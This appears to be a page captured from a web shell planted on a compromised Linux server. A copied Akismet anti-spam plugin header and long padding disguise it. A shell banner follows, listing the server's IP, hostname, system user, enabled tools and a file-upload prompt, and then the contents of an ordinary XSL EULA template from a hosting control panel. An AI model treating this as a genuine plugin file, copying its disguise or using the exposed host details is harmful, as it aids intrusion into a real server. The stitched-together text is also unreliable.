#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 62.109.13.187 / Your IP : 216.73.216.11 [ Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28 System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : mosrembit ( 6064) PHP Version : 8.2.28 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/local/mgr5/skins/orion/ |
Upload File : |
<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html" encoding="UTF-8" doctype-public="-//W3C//DTD HTML 4.01 Transitional//EN"/>
<xsl:variable name="theme" select="/doc/@theme"/>
<xsl:variable name="binary" select="/doc/@binary"/>
<xsl:variable name="msg" select="/doc/messages"/>
<xsl:template match="/doc">
<html>
<head>
<link href="{$theme}default/main.css" rel="stylesheet" type="text/css"/>
<title><xsl:value-of select="/doc/h1[1]"/></title>
<xsl:if test="/doc/@host"><base href='{/doc/@host}{/doc/@theme}{/doc/@img}'/></xsl:if>
<script language="JavaScript">
<xsl:if test="not(/doc/@host)">document.write( "<base href='"+location.protocol+"//"+location.host+"<xsl:value-of select="/doc/@theme"/><xsl:value-of select="/doc/@img"/>'>" );</xsl:if>
</script>
<style>
input:invalid {
background-color: #ffdddd;
}
</style>
</head>
<body class="eula-body">
<div class="eula-content"><xsl:apply-templates/></div>
<br/><br/><br/>
</body>
</html>
</xsl:template>
<xsl:template match="h1">
<h1 class="eula"><xsl:apply-templates/></h1>
</xsl:template>
<xsl:template match="h2">
<h2 class="eula"><xsl:apply-templates/></h2>
</xsl:template>
<xsl:template match="div">
<div><xsl:for-each select="@*"><xsl:copy/></xsl:for-each><xsl:apply-templates/></div>
</xsl:template>
<xsl:template match="form">
<form>
<xsl:attribute name="onsubmit">
if (this.checkValidity && !this.checkValidity()) {
window.document.querySelector(':invalid').focus();
return false;
}
</xsl:attribute>
<input type="hidden" name="answer" value="" id="answer"/>
<input type="hidden" name="func" value="eula"/>
<input type="hidden" name="newwindow" value="eula"/>
<xsl:apply-templates/>
</form>
</xsl:template>
<xsl:template match="field">
<div class="eula-form-wrapper">
<div class="eula-form"><xsl:copy-of select="*"/></div>
</div>
</xsl:template>
<xsl:template match="p">
<p class="eula"><xsl:apply-templates/></p>
</xsl:template>
<xsl:template match="ul">
<ul class="eula"><xsl:apply-templates/></ul>
</xsl:template>
<xsl:template match="li">
<li class="eula"><xsl:apply-templates/></li>
</xsl:template>
<xsl:template match="u">
<u><xsl:apply-templates/></u>
</xsl:template>
<xsl:template match="br">
<br/>
</xsl:template>
<xsl:template match="buttons">
<div align="center" style="margin-top: 20px;"><xsl:apply-templates/></div>
</xsl:template>
<xsl:template match="button">
<input type="submit" class="b-button">
<xsl:attribute name="value"><xsl:value-of select="@value"/></xsl:attribute>
<xsl:attribute name="onclick">
<xsl:choose>
<xsl:when test="@action = 'decline'">
window.location = '<xsl:value-of select="$binary"/>?func=eula&answer=decline&newwindow=yes';
</xsl:when>
<xsl:otherwise>
document.getElementById('answer').value = '<xsl:value-of select="@action"/>';
</xsl:otherwise>
</xsl:choose>
</xsl:attribute>
</input>
</xsl:template>
</xsl:stylesheet>